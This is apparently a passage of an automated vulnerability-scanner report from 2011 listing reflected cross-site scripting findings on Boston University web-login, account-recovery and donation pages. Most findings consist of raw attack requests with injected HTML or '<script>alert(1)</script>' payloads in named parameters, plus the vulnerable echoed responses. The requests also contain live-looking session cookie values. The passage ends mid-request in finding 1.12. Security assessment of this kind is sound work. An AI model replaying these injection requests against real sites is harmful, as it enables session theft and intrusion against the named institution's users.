<a href="https://weblogin.bu.edu/web@login3?jsv=1.5p&br=un&fl=029178"><a>6e4aa055633&wantsMobile=true">
...[SNIP]...

1.3. https://weblogin.bu.edu//web@login3 [jsv parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   //web@login3

Issue detail

The value of the jsv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a644"><a>54f2c5b14d7 was submitted in the jsv parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET //web@login3?jsv=1.5p4a644"><a>54f2c5b14d7&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:20 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYZArxHDsAAFUvG-o
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:48:20 GMT
Set-Cookie: wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYZArxHDsAAFJeW14AAAAS
X-BU-Duration: D=165435
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2750

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...
<a href="https://weblogin.bu.edu/web@login3?jsv=1.5p4a644"><a>54f2c5b14d7&br=un&fl=0&wantsMobile=true">
...[SNIP]...

1.4. https://weblogin.bu.edu//web@login3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   //web@login3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd03"><a>8d5babe57fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET //web@login3?jsv=1.5p&br=un&fl=0&1dd03"><a>8d5babe57fd=1 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:50:04 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYzArxHDsAAFlFLWo
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:50:04 GMT
Set-Cookie: wl4cap=1317837004%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYzArxHDsAAFpMvBcAAAAG
X-BU-Duration: D=895611
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2753

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...
<a href="https://weblogin.bu.edu/web@login3?jsv=1.5p&br=un&fl=0&1dd03"><a>8d5babe57fd=1&wantsMobile=true">
...[SNIP]...

1.5. https://weblogin.bu.edu/accounts/forgot [_authref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/forgot

Issue detail

The value of the _authref request parameter is copied into the HTML document as plain text between tags. The payload 4842b<script>alert(1)</script>4d8a65282d2b3ae69 was submitted in the _authref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /accounts/forgot?preview=0&_authref=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv44842b<script>alert(1)</script>4d8a65282d2b3ae69&template_extension=ph&_hostname=ph&query_string=&_page_number_=1&_conffile=&_next_f=bulogin_forgot%3A%3Ahandle_identify&_current_f=bulogin_forgot%3A%3Aoutput_identify&ns=&_last_name=xss&_login_name=xss&_email_address=xss&forgotlogin_button=FORGOT+LOGIN+NAME HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://weblogin.bu.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:53:48 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToyZqgrxHDsAAGU1-6gAAAAZ
X-BU-Duration: D=2136300
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 386

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>[LOOP] Get New authref Error</title>
</head><body><FONT color="#CC
...[SNIP]...
<p>Could not look up (cussp-srv44842b<script>alert(1)</script>4d8a65282d2b3ae69)</p>
...[SNIP]...

1.6. https://weblogin.bu.edu/accounts/forgot [_hostname parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   /accounts/forgot

Issue detail

The value of the _hostname request parameter is copied into the HTML document as plain text between tags. The payload be0c2<a>dfae92bebe2 was submitted in the _hostname parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /accounts/forgot HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Content-Length: 322
Cache-Control: max-age=0
Origin: https://weblogin.bu.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

preview=0&_authref=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4&template_extension=ph&_hostname=phbe0c2<a>dfae92bebe2&query_string=&_page_number_=1&_conffile=&_next_f=bulogin_forgot%3A%3Ahandle_identify&_current_f=bulogin_forgot%3A%3Aoutput_identify&ns=&_last_name=xss&_login_name=xss&_email_address=xss&forgotlogin_b
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:56:09 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Expires: Tue, 04 Oct 2011 17:56:09 GMT
pragma: no-cache
cache-control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToyaNgrxHDsAAFh3Tq0AAAA8
X-BU-Duration: D=3325797
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5045


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>
[2] Get Sys Config Error
</title>
<meta http-equiv="Content-Type" content="text/html;">
<!--Fireworks MX 2004 Dr
...[SNIP]...
<b>libuseradm_db::read_config(phbe0c2<a>dfae92bebe2): /usr/local/USERADM/phbe0c2<a>
...[SNIP]...

1.7. https://weblogin.bu.edu/web@login3 [br parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   /web@login3

Issue detail

The value of the br request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe38"><a>65f2229c969 was submitted in the br parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=undbe38"><a>65f2229c969&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:51:16 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyZFArxHDsAAE79D8E
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:51:16 GMT
Set-Cookie: wl4cap=1317837077%2Cjsver%3D%2Cbrowser%3D%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyZFArxHDsAAE5UE7gAAAAH
X-BU-Duration: D=479054
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2779

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...
<a href="https://weblogin.bu.edu/web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=undbe38"><a>65f2229c969&fl=0&wantsMobile=true">
...[SNIP]...

1.8. https://weblogin.bu.edu/web@login3 [fl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   /web@login3

Issue detail

The value of the fl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bbb"><a>ebd5cc1f14a was submitted in the fl parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0b4bbb"><a>ebd5cc1f14a HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:51:38 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyZKgrxHDsAAFvabaQ
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:51:38 GMT
Set-Cookie: wl4cap=1317837098%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D; path=/
X-BU-Main-Uniqueid: ToyZKgrxHDsAAFsRUgEAAAAk
X-BU-Duration: D=318864
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2779

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...
<a href="https://weblogin.bu.edu/web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0b4bbb"><a>ebd5cc1f14a&wantsMobile=true">
...[SNIP]...

1.9. https://weblogin.bu.edu/web@login3 [jsv parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   /web@login3

Issue detail

The value of the jsv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b7e"><a>98e1ecc0ecf was submitted in the jsv parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d735b7e"><a>98e1ecc0ecf&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:50:59 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyZAwrxHDsAAFt7xr0
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:50:59 GMT
Set-Cookie: wl4cap=1317837059%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyZAwrxHDsAAFsicFgAAAA5
X-BU-Duration: D=274785
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2779

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...
<a href="https://weblogin.bu.edu/web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d735b7e"><a>98e1ecc0ecf&br=un&fl=0&wantsMobile=true">
...[SNIP]...

1.10. https://weblogin.bu.edu/web@login3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   /web@login3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b24f"><a>11ad2d59aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0&6b24f"><a>11ad2d59aae=1 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:52:29 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyZXQrxHDsAAFUvHN4
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:52:29 GMT
Set-Cookie: wl4cap=1317837150%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyZXQrxHDsAAFIjVnoAAAAP
X-BU-Duration: D=261481
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2782

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...
<a href="https://weblogin.bu.edu/web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0&6b24f"><a>11ad2d59aae=1&wantsMobile=true">
...[SNIP]...

1.11. https://www.bu.edu/phpbin/telegraph/ [comments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/telegraph/

Issue detail

The value of the comments request parameter is copied into the HTML document as plain text between tags. The payload 12e42<script>alert(1)</script>e3378580d6496993 was submitted in the comments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /phpbin/telegraph/?form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&phone=&email=&school=n%2Fa&year=&caller=&amount_other=&matching=&number_of_months=%23+of&designation=&fund_other=&comments=12e42<script>alert(1)</script>e3378580d6496993&submit2=Make+Your+Gift HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.bu.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bu.edu/alumni-forms/forms/giving/online/index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:06:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToycowrxHDYAAE@P-O0AAART
X-BU-Duration: D=1163093
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 59748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...
<textarea name="comments" cols="35" rows="2" wrap="virtual">12e42<script>alert(1)</script>e3378580d6496993</textarea>
...[SNIP]...

1.12. https://www.bu.edu/phpbin/telegraph/ [fund_other parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/telegraph/

Issue detail

The value of the fund_other request parameter is copied into the HTML document as plain text between tags. The payload 2850d<script>alert(1)</script>f93343ad016b277d2 was submitted in the fund_other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /phpbin/telegraph/?form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&phone=&email=&school=n%2Fa&year=&caller=&amount_other=&matching=&number_of_months=%23+of&designation=&fund_other=2850d<script>alert(1)</script>f93343ad016b277d2&comments=&submit2=Make+Your+Gift HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.bu.edu
